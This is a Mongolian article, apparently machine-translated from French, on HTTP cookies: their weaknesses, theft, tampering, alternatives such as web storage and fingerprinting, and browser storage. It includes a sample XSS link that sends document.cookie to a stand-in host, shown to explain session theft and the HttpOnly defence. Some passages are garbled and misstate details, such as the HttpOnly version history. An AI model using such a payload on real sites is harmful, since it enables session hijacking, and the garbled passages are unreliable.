Хэрэглэгчийн вэб туршлагад сөргөөр нөлөөлөхгүйгээр нууцлалыг нэмэгдүүлэх, зар сурталчилгааны хяналтыг багасгах зорилгоор гуравдагч талын күүкиг ихэнх хөтчүүд хааж болно. Олон зар сурталчилгааны агентлагууд ийм сонголтыг санал болгодог татгалзах зорилтот зар сурталчилгаанд зориулж хөтөч дээр ерөнхий күүки суулгаж, энэ зорилтот тохиргоог идэвхгүй болгож чадна, гэхдээ ийм шийдэл нь хэрэгжих үед үр дүнтэй биш юм, учир нь хэрэглэгч эдгээр күүкиг устгасан даруйд энэ ерөнхий күүкийг устгаж, сонголтоо цуцална. гарах шийдвэр.

Күүкийн сул тал

Нууцлалын асуудлаас гадна күүки нь техникийн зарим сул талтай байдаг. Ялангуяа тэд хэрэглэгчдийг тэр бүр үнэн зөв тодорхойлж чаддаггүй, олон тооны үед сайтын гүйцэтгэлийг удаашруулж, аюулгүй байдлын халдлагад ашиглаж болох ба програм хангамжийн төлөвийн дамжуулалт, архитектурын хэв маягтай зөрчилддөг.

Тодорхой бус тодорхойлох

Хэрэв компьютер дээр нэгээс олон хөтөч ашигладаг бол тэдгээр нь тус бүрдээ күүки хадгалах тусдаа төхөөрөмжтэй байдаг. Тиймээс күүки нь хүнийг танихгүй, харин хэрэглэгчийн бүртгэл, компьютер, вэб хөтчийн хослол юм. Тиймээс хэн ч эдгээр бүртгэл, компьютер эсвэл күүки агуулсан хөтчүүдийг ашиглаж болно. Үүний нэгэн адил күүки нь "интернет кафе" эсвэл компьютерийн нөөцөд чөлөөтэй нэвтрэх боломжтой газар гэх мэт ижил хэрэглэгчийн бүртгэл, компьютер, хөтчийг хуваалцдаг олон хэрэглэгчдийг ялгадаггүй.

Гэвч бодит байдал дээр энэ мэдэгдэл ихэнх тохиолдолд хуурамч болж хувирдаг, учир нь өнөөдөр "хувийн" компьютер (эсвэл ухаалаг утас, таблет, илүү муу нь) нэг хүн голчлон ашигладаг. Энэ нь тодорхой нэг хүнийг онилсонтой адил юм. Цуглуулсан мэдээллийн хэмжээгээр дамжуулан тухайн хүнийг "тодорхойгүй" байсан ч гэсэн хувийн зорилтот түвшинд хүрдэг.

Күүкийн хулгай

Сүлжээнд байгаа өөр компьютер күүки хулгайлж болно.

Хэвийн ажиллагааны явцад күүки сервер (эсвэл ижил домэйн дэх серверүүдийн бүлэг) болон хэрэглэгчийн компьютерийн хөтөч хооронд буцаж илгээгддэг. Күүки нь нууц мэдээлэл (хэрэглэгчийн нэр, нэвтрэлт танилтад ашигласан нууц үг гэх мэт) агуулж болох тул тэдгээрийн утгыг бусад компьютер ашиглах боломжгүй. Күүки хулгайлах нь жигнэмэгийг зөвшөөрөлгүй гуравдагч этгээдээр саатуулах үйлдэл юм.

Сеанс хулгайлах гэж нэрлэгддэг халдлагад пакет илрүүлэгчээр дамжуулан күүки хулгайлж болно. Сүлжээний траффикийг илгээх, хүлээн авахаас бусад компьютерууд (ялангуяа шифрлэгдээгүй нийтийн Wi-Fi зайд) саатуулж унших боломжтой. Энэ траффик нь энгийн HTTP протоколыг ашиглан сессээр илгээсэн күүки агуулдаг. Сүлжээний траффик шифрлэгдээгүй тохиолдолд хортой хэрэглэгчид "пакет sniffers" ашиглан сүлжээн дэх бусад хэрэглэгчдийн харилцааг унших боломжтой.

HTTPS протоколыг ашиглан хэрэглэгчийн компьютер болон сервер хоорондын холболтыг шифрлэх замаар энэ асуудлыг даван туулж болно. Сервер нь зааж өгч болно аюулгүй туг жигнэмэг хийх үед; хөтөч үүнийг зөвхөн SSL холболт гэх мэт аюулгүй шугамаар илгээх болно.

Гэсэн хэдий ч олон сайтууд хэрэглэгчийн нэвтрэлт танилтад HTTPS шифрлэгдсэн харилцаа холбоог (жишээ нь нэвтрэх хуудас) ашиглаж байгаа боловч үр ашгийн үүднээс шифрлэгдээгүй HTTP холболтоор дамжуулан сеансын күүки болон бусад өгөгдлийг ердийнхөөрөө илгээдэг. Тиймээс халдагчид бусад хэрэглэгчдийн күүкиг таслан зогсоож, зохих сайтууд дээр тэдний дүр эсгэх эсвэл күүки халдлагад ашиглах боломжтой.

Сайт дахь скрипт: зөвхөн сервер болон үйлчлүүлэгчийн хооронд солигдох ёстой күүкийг өөр гуравдагч этгээд рүү илгээдэг.

Күүки хулгайлах өөр нэг арга бол сайтуудыг скрипт хийж, хөтөч өөрөө күүки хэзээ ч хүлээн авдаггүй хортой сервер рүү илгээх явдал юм. Орчин үеийн хөтчүүд нь серверээс хайж буй кодын хэсгийг гүйцэтгэх боломжийг олгодог. Хэрэв ажлын явцад күүки рүү хандвал тэдгээрийн утгыг тэдгээрт хандах ёсгүй серверт ямар нэгэн хэлбэрээр дамжуулж болно. Күүкийг сүлжээгээр илгээхээс өмнө шифрлэх нь халдлагаас сэргийлэхэд тус болохгүй.

Энэ төрлийн сайтын скриптийг ихэвчлэн HTML контентыг нийтлэх боломжийг хэрэглэгчдэд олгодог сайтууд дээр халдагчид ашигладаг. Тохиромжтой кодын нэг хэсгийг HTML хувь нэмэрт нэгтгэснээр халдагчид бусад хэрэглэгчдээс күүки хүлээн авах боломжтой. Эдгээр күүкиний талаарх мэдлэгийг хулгайлсан күүки ашиглан нэг сайтад холбогдон ашиглах боломжтой бөгөөд ингэснээр күүкиг хулгайлагдсан хэрэглэгч гэж хүлээн зөвшөөрнө.

Ийм халдлагаас урьдчилан сэргийлэх нэг арга бол HttpOnly тугийг ашиглах явдал юм; Энэ нь 6 хувилбараас хойш PHP-д Internet Explorer-ийн 5.2.0-р хувилбараас хойш нэвтрүүлсэн сонголт бөгөөд энэ нь күүкиг скриптийн ойролцоо үйлчлүүлэгчид ашиглах боломжгүй болгохоор төлөвлөж байна. Гэсэн хэдий ч вэб хөгжүүлэгчид сайтаа хөгжүүлэхдээ үүнийг анхаарч үзэх хэрэгтэй бөгөөд ингэснээр сайт дээр скрипт бичихээс хамгаална.

Ашигласан аюулгүй байдлын өөр нэг аюул бол сайтад эрэлт хэрэгцээг бий болгох явдал юм.

Албан ёсны техникийн тодорхойлолт нь күүкиг зөвхөн үүссэн домэйны сервер рүү буцааж илгээх боломжийг олгодог. Гэсэн хэдий ч күүкиний утгыг күүки толгойноос өөр хэрэгслээр бусад серверүүд рүү илгээж болно.

Ялангуяа JavaScript гэх мэт скрипт хэлүүд нь күүкийн утгуудад хандах эрхтэй бөгөөд интернетийн дурын сервер рүү дурын утгыг илгээх чадвартай байдаг. Энэхүү скрипт бичих чадварыг хэрэглэгчид HTML контентыг бусад хэрэглэгчдэд үзэх боломжийг олгодог вэбсайтуудаас ашигладаг.

Жишээлбэл, example.com домэйн дээр үйл ажиллагаа явуулж буй халдагч өөрийн хяналтгүй алдартай блог руу чиглэсэн дараах холбоосыг агуулсан сэтгэгдлийг нийтэлж болно:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Өөр хэрэглэгч энэ холбоос дээр дарахад хөтөч кодын onclick атрибутын хэсгийг ажиллуулдаг тул document.cookie мөрийг энэ хуудсанд идэвхтэй байгаа хэрэглэгчийн күүкийн жагсаалтаар сольдог. Тиймээс энэхүү күүкийн жагсаалтыг example.com сервер рүү илгээдэг бөгөөд халдагчид энэ хэрэглэгчийн күүкийг цуглуулах боломжтой.

Энэ төрлийн халдлагыг хэрэглэгчийн талаас илрүүлэхэд хэцүү байдаг, учир нь скрипт нь күүкийг тохируулсан ижил домэйноос ирдэг бөгөөд утгыг илгээх үйлдлийг тухайн домэйн зөвшөөрсөн мэт харагдана. Хортой код нийтлэхээс сэргийлсэн хязгаарлалт тавих нь энэ төрлийн сайтыг ажиллуулж буй админуудын үүрэг гэж үздэг.

Хэрэв күүки нь HttpOnly тугтай илгээсэн бол JavaScript зэрэг клиент талын програмуудад шууд харагдахгүй. Серверийн үүднээс авч үзвэл цорын ганц ялгаа нь Set-Cookie толгой хэсгийн мөрөнд HttpOnly мөрийг агуулсан шинэ талбар нэмэгдсэн явдал юм.

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Хөтөч ийм күүки хүлээн авахдаа үүнийг дараах HTTP солилцоонд ердийн байдлаар ашиглах ёстой, гэхдээ үйлчлүүлэгчийн талд гүйцэтгэсэн скриптүүдэд харагдахгүй. HttpOnly туг нь ямар ч албан ёсны техникийн үзүүлэлтүүдийн нэг хэсэг биш бөгөөд бүх хөтөч дээр хэрэгждэггүй. XMLHTTPRequest аргаар сесс күүки унших, бичихээс урьдчилан сэргийлэх арга одоогоор байхгүй гэдгийг анхаарна уу.

Агуулгын өөрчлөлт: халдагч хүчингүй күүкийг сервер рүү илгээдэг бөгөөд энэ нь серверээс илгээсэн хүчинтэй күүки байж магадгүй юм.

Күүкийг өөрчлөх

Күүкийг серверт хадгалж, өөрчлөгдөөгүй буцаах шаардлагатай бол халдагчид сервер рүү буцааж илгээхээс өмнө күүкигийн утгыг өөрчлөх боломжтой. Жишээлбэл, күүки нь дэлгүүрийн сагсанд байршуулсан барааны үнэд хэрэглэгчийн төлөх ёстой нийт үнэ цэнийг агуулж байгаа бол энэ утгыг өөрчилснөөр сервер халдагчид анхны үнээс бага хэмжээний төлбөр төлөх эрсдэлтэй болно. Күүкийн үнэ цэнийг өөрчлөх үйл явц гэж нэрлэдэг жигнэмэгийн хордлого мөн жигнэмэг хулгайлсаны дараа халдлагыг тогтвортой байлгахын тулд ашиглаж болно.

Күүкийг хүчингүй болгох аргын хувьд халдагчид сервер рүү хүчингүй күүки илгээхийн тулд хөтчийн алдааг ашигладаг.

Гэсэн хэдий ч ихэнх вэбсайтууд зөвхөн сессийн ID буюу сеансын хэрэглэгчийг тодорхойлоход ашигладаг санамсаргүй байдлаар үүсгэгдсэн өвөрмөц дугаарыг күүкид хадгалдаг бол бусад бүх мэдээллийг сервер дээр хадгалдаг. Энэ тохиолдолд энэ асуудал үндсэндээ шийдэгддэг.

Вэбсайт хоорондын күүки боловсруулах

Сайт бүр өөрийн гэсэн күүкитэй байх ёстой тул нэг сайт өөр сайттай холбоотой күүкийг өөрчлөх, үүсгэх боломжгүй байх ёстой. Вэб хөтчийн аюулгүй байдлын алдаа нь хортой сайтуудад энэ дүрмийг зөрчих боломжийг олгодог. Ийм согогийг ашиглахыг ихэвчлэн гэж нэрлэдэг газар хоорондын хоол хийх. Ийм халдлагын зорилго нь сессийн ID хулгай байж болно.

Хэрэглэгчид эдгээр эмзэг байдлыг бараг арилгасан вэб хөтчийн хамгийн сүүлийн хувилбарыг ашиглах ёстой.

Үйлчлүүлэгч болон серверийн хоорондох зөрчилдөөнтэй байдал

Күүки ашиглах нь үйлчлүүлэгчийн төлөв болон күүкид хадгалагдсан төлөвийн хооронд зөрчил үүсгэж болзошгүй. Хэрэв хэрэглэгч күүки олж аваад хөтчийн "Буцах" товчийг дарвал хөтчийн төлөв байдал ерөнхийдөө энэ худалдан авалтаас өмнөхтэй адилгүй байна. Жишээлбэл, хэрэв онлайн дэлгүүрийн сагсыг күүки ашиглан үүсгэсэн бол хэрэглэгч хөтчийн түүх рүү буцаж ирэхэд сагсны агуулга өөрчлөгдөх боломжгүй: хэрэв хэрэглэгч сагсандаа нийтлэл нэмэх товчийг дараад "Буцах" дээр дарвал. " товчлуур, нийтлэл энэ нийтлэлд хэвээр байна. Энэ нь нийтлэлийн нэмэлтийг цуцлахыг хүссэн хэрэглэгчийн зорилго биш байж магадгүй юм. Энэ нь найдваргүй байдал, төөрөгдөл, алдаа гаргахад хүргэдэг. Тиймээс вэб хөгжүүлэгчид энэ асуудлыг мэдэж, үүнтэй төстэй нөхцөл байдлыг шийдвэрлэх арга хэмжээ авах ёстой.

Күүки дуусах хугацаа

Байнгын күүки нь удахгүй дуусахгүй гэж нууцлалын аюулгүй байдлын мэргэжилтнүүд шүүмжилдэг бөгөөд ингэснээр вэбсайтуудад хэрэглэгчдийг хянах, тэдний профайлыг цаг хугацааны явцад бий болгох боломжийг олгодог. Күүкийн энэ тал нь мөн сесс хулгайлах асуудлын нэг хэсэг юм, учир нь хулгайлагдсан байнгын күүки нь хэрэглэгчийн дүрийг удаан хугацаанд харуулахад ашиглагдаж болно.

Үүнийг уншихын тулд: ГАФАМ: Тэд хэн бэ? Тэд яагаад (заримдаа) ийм аймшигтай байдаг вэ?

Күүкийн өөр хувилбарууд

Күүки ашиглан хийж болох зарим үйлдлүүд нь күүкиг тойрч гарах эсвэл устгасан күүкиг дахин үүсгэх бусад механизмуудыг ашиглан гүйцэтгэж болох бөгөөд энэ нь күүкитэй ижил аргаар (эсвэл заримдаа үл үзэгдэх учраас бүр дорддог) нууцлалын асуудлыг үүсгэдэг.

IP хаяг

Хуудас руу залгаж буй компьютерийн IP хаягаар хэрэглэгчдийг хянах боломжтой. Энэ техникийг World Wide Web-ийг нэвтрүүлснээс хойш ашиглах боломжтой болсон, учир нь хуудсуудыг татаж авах үед сервер нь хөтөч эсвэл прокси ажиллуулж байгаа компьютерийн IP хаягийг шаарддаг. Ашиглаж буй күүки байгаа эсэхээс үл хамааран сервер энэ мэдээллийг хянах боломжтой. Гэсэн хэдий ч, эдгээр хаягууд нь күүки гэхээсээ илүү хэрэглэгчийг тодорхойлоход найдвартай биш байдаг, учир нь компьютер болон проксиг олон хэрэглэгч хуваалцаж, нэг компьютер нь ажлын сесс бүр дээр өөр IP хаяг хүлээн авах боломжтой (жишээлбэл, утасны холболтод ихэвчлэн тохиолддог). .

Цахилгаан асаалттай үед ижил IP хаягийг удаан хугацаагаар хадгалах өргөн зурвасын холболт гэх мэт зарим тохиолдолд IP хаягаар хянах нь найдвартай байж болно.

Tor зэрэг зарим системүүд нь интернетийн нэрээ нууцлах, IP хаягаар хянах боломжгүй эсвэл боломжгүй болгох зорилготой юм.

URL

Илүү нарийвчлалтай техник нь URL-д мэдээлэл оруулахад суурилдаг. URL-ийн асуулгын мөрийн хэсэг нь энэ зорилгоор ихэвчлэн ашиглагддаг нэг техник боловч бусад хэсгүүдийг бас ашиглаж болно. Java serverlet болон PHP сессийн механизм хоёулаа күүкиг идэвхжүүлээгүй тохиолдолд энэ аргыг ашигладаг.

Энэ арга нь вэб сервер нь вэб хуудасны холбоосыг хөтч рүү илгээх үед стринг хүсэлтийг хавсаргах явдал юм. Хэрэглэгч холбоосыг дагах үед хөтөч нь хавсаргасан асуулгын мөрийг сервер рүү буцаана.

Энэ зорилгоор ашигладаг асуулгын мөрүүд болон күүкигүүд нь серверээс дур зоргоороо сонгогдсон, хөтчөөс буцаасан мэдээлэлтэй маш төстэй юм. Гэсэн хэдий ч зарим нэг ялгаа байдаг: асуулгын мөр агуулсан URL-г дахин ашиглах үед сервер рүү ижил мэдээлэл илгээгддэг. Жишээлбэл, хэрэв хэрэглэгчийн тохиргоог URL-н асуулгын мөрөнд кодлосон бөгөөд хэрэглэгч тэр URL-ыг өөр хэрэглэгч рүү имэйлээр илгээвэл тухайн хэрэглэгч мөн эдгээр тохиргоог ашиглах боломжтой болно.

Нөгөөтэйгүүр, хэрэглэгч нэг хуудсанд хоёр удаа хандвал ижил хайлтын мөрийг хоёр удаа ашиглах баталгаа байхгүй. Жишээлбэл, хэрэв хэрэглэгч эхний удаад дотоод сайтын хуудаснаас нэг хуудас руу орж, хоёр дахь удаагаа гадаад хуудаснаас нэг хуудсанд буувал сайтын хуудастай холбоотой асуулгын мөр нь ихэвчлэн өөр байдаг бол күүки нь ижил байдаг. .

Асуулгын мөрийн бусад сул тал нь аюулгүй байдалтай холбоотой: сессийг тодорхойлсон өгөгдлийг асуулгын мөрөнд хадгалах нь сесс засах халдлага, танигчийн лавлагааны халдлага болон бусад мөлжлөгийг идэвхжүүлдэг эсвэл хялбаршуулдаг. Сеансын ID-г HTTP күүки болгон дамжуулах нь илүү аюулгүй.

Нууц хэлбэрийн талбар

ASP.NET-ийн ашигладаг сессийг хянах нэг хэлбэр нь далд талбар бүхий вэб маягтуудыг ашиглах явдал юм. Энэ техник нь мэдээлэл зөөвөрлөхийн тулд URL асуулгын мөрүүдийг ашиглахтай маш төстэй бөгөөд ижил давуу болон сул талуудтай; Хэрэв маягтыг HTTP GET аргаар боловсруулж байгаа бол талбарууд нь маягтыг илгээх үед илгээх хөтчийн URL-ийн нэг хэсэг болно. Гэхдээ ихэнх маягтыг HTTP POST-оор боловсруулдаг бөгөөд энэ нь маягтын мэдээлэл, түүний дотор далд талбаруудыг URL-ийн хэсэг ч биш, күүки ч биш нэмэлт оролт болгон нэмэхэд хүргэдэг.

Энэ арга нь мөрдөх үүднээс хоёр давуу талтай: нэгдүгээрт, URL-аас илүү HTML эх код болон POST оролтонд байрлуулсан мэдээллийг хянах нь энгийн хэрэглэгчдэд энэ мөрдөхөөс зайлсхийх боломжийг олгоно; Хоёрдугаарт, хэрэглэгч URL-г хуулах үед сессийн мэдээллийг хуулахгүй (жишээлбэл, хуудсыг диск рүү хадгалах эсвэл имэйлээр илгээх).

цонх.нэр

Бүх нийтлэг вэб хөтчүүд нь DOM-ийн window.name өмчийг ашиглан JavaScript-ээр маш их хэмжээний өгөгдлийг (2МБ-аас 32МБ хүртэл) хадгалах боломжтой. Энэ өгөгдлийг сессийн күүкиний оронд ашиглаж болох ба домэйн даяар ашигладаг. Үйлчлүүлэгч талын сессийн хувьсагчийн цогц багцыг хадгалахын тулд техникийг JSON объектуудтай хослуулж болно.

Сул тал нь тусдаа цонх эсвэл таб бүр эхлээд хоосон цонхтой байх болно.name; цонхоор үзэхэд (хэрэглэгчийн нээсэн) энэ нь тус тусдаа нээгдсэн табууд цонхны нэргүй болно гэсэн үг юм. Нэмж дурдахад window.name нь нууцлалын асуудал үүсгэж болох өөр өөр сайтуудаар зочлогчдыг хянахад ашиглагдаж болно.

Зарим талаараа энэ нь серверийн оролцоогүйн улмаас күүкигээс илүү аюулгүй байж болох тул түүнийг sniffer cookie-ийн сүлжээний халдлагад өртөх боломжгүй болгодог. Гэсэн хэдий ч, өгөгдлийг хамгаалахын тулд тусгай арга хэмжээ авбал энэ нь нэг цонхонд нээгдсэн бусад сайтуудаар дамжуулан мэдээлэл авах боломжтой тул цаашдын халдлагад өртөмтгий байдаг.

HTTP баталгаажуулалт

HTTP протокол нь хандалтын баталгаажуулалтын үндсэн протоколууд болон хандалтын баталгаажуулалтын тоймыг агуулдаг бөгөөд энэ нь зөвхөн хэрэглэгч хэрэглэгчийн нэр, нууц үгээ өгсөн тохиолдолд вэб хуудас руу нэвтрэх боломжийг олгодог. Хэрэв сервер вэб хуудсанд хандах эрх олгох гэрчилгээг хүсэх юм бол хөтөч үүнийг хэрэглэгчээс хүсэх ба хүлээн авсны дараа хөтөч үүнийг хадгалж, дараагийн бүх HTTP хүсэлтүүдэд илгээдэг. Энэ мэдээллийг хэрэглэгчийг хянахад ашиглаж болно.

Орон нутгийн хуваалцсан объект

Хэрэв хөтөч нь Adobe Flash Player залгаасыг агуулдаг бол орон нутгийн хуваалцсан объектууд күүкитэй ижил зорилгоор ашиглаж болно. Эдгээр нь вэб хөгжүүлэгчдийн сонирхол татахуйц сонголт байж болох тул:

• локал хуваалцсан объектын өгөгдмөл хэмжээ хязгаар нь 100 KB;
• аюулгүй байдлын шалгалт нь хэрэглэгчийн күүки шалгалтаас тусдаа байдаг (иймээс күүки байхгүй үед орон нутгийн хуваалцсан объектуудыг зөвшөөрч болно).

Энэ сүүлчийн цэг нь күүки удирдлагын бодлогыг Adobe-ийн локал хуваалцсан объектуудаас ялгаж өгдөг асуултуудыг төрүүлдэг хэрэглэгчийн хувийн нууцлалын тохиргоог удирдах талаар: тэр күүкигийн удирдлага нь локал хуваалцсан объектын удирдлагад ямар ч нөлөө үзүүлэхгүй гэдгийг мэдэж байх ёстой.

Энэ системийн бас нэг шүүмжлэл бол вэб стандарт биш, зөвхөн Adobe Flash Player залгаасыг ашиглан ашиглах боломжтой юм.

Үйлчлүүлэгчийн тууштай байдал

Зарим вэб хөтчүүд нь скриптэд суурилсан тогтвортой механизмыг дэмждэг бөгөөд энэ нь тухайн хуудсанд дараа нь ашиглах мэдээллийг дотооддоо хадгалах боломжийг олгодог. Жишээлбэл, Internet Explorer нь хөтөчийн түүх, хавчуурга, XML форматаар эсвэл дискэнд хадгалагдсан вэб хуудасны байнгын мэдээллийг дэмждэг. Microsoft Internet Explorer 5-ын хувьд DHTML зан үйлээр дамжуулан ашиглах боломжтой хэрэглэгчийн өгөгдөлийн арга байдаг.

W3C нь HTML 5-д вэб хадгалах гэж нэрлэгддэг клиент талын өгөгдөл хадгалах шинэ JavaScript API-г нэвтрүүлсэн бөгөөд күүкиг бүрмөсөн солих зорилготой юм. Энэ нь күүкитэй төстэй боловч хүчин чадал нь ихээхэн сайжирсан бөгөөд HTTP хүсэлтийн толгой хэсэгт мэдээлэл хадгалдаггүй. API нь байнгын күүки болон сесс күүкитэй адил локал хадгалах ба сессийн хадгалах гэсэн хоёр төрлийн вэб хадгалах боломжийг олгодог (хөтөч хаагдах үед сессийн күүкийн хугацаа дуусахаас бусад нь). сеанс хадгалах tab хаагдсан үед хугацаа нь дуусна). Вэб санг Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 болон Opera 10.50 дэмждэг.

Өөр өөр механизм нь вэб хуудсан дээрх JavaScript програмуудыг ашиглан хөтчийн кэш (сэргээхээс илүү санах ойд) дээр тулгуурладаг. 

Жишээлбэл, хуудас нь шошгыг агуулж болно . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Энэ үед програм нь кэш санах ойд үлдэж, зочилсон хуудсыг хоёр дахь удаагаа дахин ачаалахгүй. Тиймээс, хэрэв програм нь глобал хувьсагчийг агуулж байвал (жишээ нь var id = 3243242;) энэ танигч хүчинтэй хэвээр байх бөгөөд хуудсыг дахин ачаалах эсвэл програмыг холбосон хуудсыг ачаалах үед бусад JavaScript кодоор ашиглах боломжтой. 

Энэ аргын гол сул тал нь JavaScript глобал хувьсагч нь статик байх ёстой бөгөөд энэ нь күүки шиг өөрчлөх эсвэл устгах боломжгүй гэсэн үг юм.

вэб хөтчийн хурууны хээ

Хөтөчийн хурууны хээ нь таних зорилгоор хөтчийн тохиргооны тохиргооны талаар цуглуулсан мэдээлэл юм. Эдгээр хурууны хээгээр күүки идэвхгүй байсан ч интернет хэрэглэгч эсвэл төхөөрөмжийг бүрэн эсвэл хэсэгчлэн танихад ашиглаж болно.

Вэб хөтчийн тохиргооны үндсэн мэдээллийг хүний ​​вэб траффикийг үнэн зөв хэмжих, дарж залилан хийх янз бүрийн хэлбэрийг илрүүлэх зорилгоор вэб сайтын үзэгчдийн үйлчилгээ эртнээс цуглуулж ирсэн. Үйлчлүүлэгч талын скрипт хэлний тусламжтайгаар илүү үнэн зөв мэдээлэл цуглуулах болно одоо боломжтой.

Энэ мэдээллийг бит стринг болгон хөрвүүлэх нь төхөөрөмжийн хурууны хээг үүсгэдэг. 2010 онд Цахим хилийн сан (EFF) хөтчийн хурууны хээний энтропийг хамгийн багадаа хэмжсэн. 18,1 бит, мөн энэ нь зотон хурууны хээний дэвшил нь энтропид 5,7 бит нэмэхээс өмнө байсан юм.

Товчхондоо жигнэмэг

Күүки гэдэг нь вэб хөтчөөр вэбсайтад зочлогчийн хатуу диск дээр хадгалагддаг жижиг текст файлууд бөгөөд (бусад зүйлсийн дотор) зочны талаарх мэдээлэл эсвэл сайтаар аялсан тухай мэдээллийг бүртгэхэд ашигладаг. Тиймээс вэбмастер нь зочны зуршлыг таньж, зочин бүрт өөрийн сайтын танилцуулгыг тохируулах боломжтой; күүки нь нүүр хуудсан дээр хэдэн нийтлэл харуулахыг санах, тэр ч байтугай аливаа хувийн этгээдийн нэвтрэх мэдээллийг хадгалах боломжийг олгодог: зочин сайт руу буцаж ирэхэд тэрээр өөрийн нэр, нууц үгээ бичих шаардлагагүй болно. тэдгээрийг күүки дотор автоматаар уншдаг тул таних боломжтой.

Күүки нь сайтын дизайнерын тогтоосон хязгаарлагдмал ашиглалтын хугацаатай. Тэд мөн сайт дээрх сессийн төгсгөлд дуусч болох бөгөөд энэ нь хөтчийг хаахтай тохирч байна. Күүки нь зочдын амьдралыг хөнгөвчлөх, илүү хэрэгцээтэй мэдээллээр хангах зорилгоор өргөн хэрэглэгддэг. Гэхдээ тусгай арга барил нь зочдыг хэд хэдэн сайт дээр дагаж мөрдөх, улмаар түүний зуршлын талаар маш өргөн мэдээлэл цуглуулж, шалгах боломжийг олгодог. Энэ арга нь күүки ашиглах нь зочдын нууцлалыг зөрчсөн тандалтын арга гэж нэр хүндийг өгсөн бөгөөд харамсалтай нь техникийн бус шалтгаанаар эсвэл хэрэглэгчийн хүлээлтийг үл тоомсорлосон олон тохиолдолд бодит байдалтай нийцдэг. .

Эдгээр хууль ёсны айдсуудын хариуд HTML 5 нь вэб хадгалах гэж нэрлэгддэг клиент талын өгөгдөл хадгалахад зориулсан шинэ JavaScript API-г нэвтрүүлсэн бөгөөд энэ нь илүү найдвартай, илүү хүчин чадалтай бөгөөд энэ нь күүкиг орлуулах зорилготой юм.

Күүкийг хадгалах

Зарим хөтчийн хувьд күүкийг хялбархан засах боломжтой, Notepad гэх мэт энгийн текст засварлагч нь утгыг гараар өөрчлөхөд хангалттай.

Хөтөчөөс хамааран күүки өөр өөр хадгалагддаг:

• Microsoft Internet Explorer күүки бүрийг өөр файлд хадгалдаг;
• Mozilla Firefox бүх күүкигээ нэг файлд хадгалдаг;
• Opera бүх күүкигээ нэг файлд хадгалж, шифрлэдэг (програм хангамжийн сонголтоос бусад тохиолдолд тэдгээрийг өөрчлөх боломжгүй);
• Apple Safari бүх күүкигээ нэг .plist өргөтгөл файлд хадгалдаг. Хэрэв та програм хангамжийн сонголтуудыг үзэхгүй бол өөрчлөх боломжтой боловч тийм ч хялбар биш юм.

Хөтөчүүдийг дэмжих шаардлагатай хамгийн бага :

• 300 нэгэн зэрэг жигнэмэг;
• жигнэмэг тутамд 4 o;
• Хост эсвэл домэйн бүрт 20 күүки.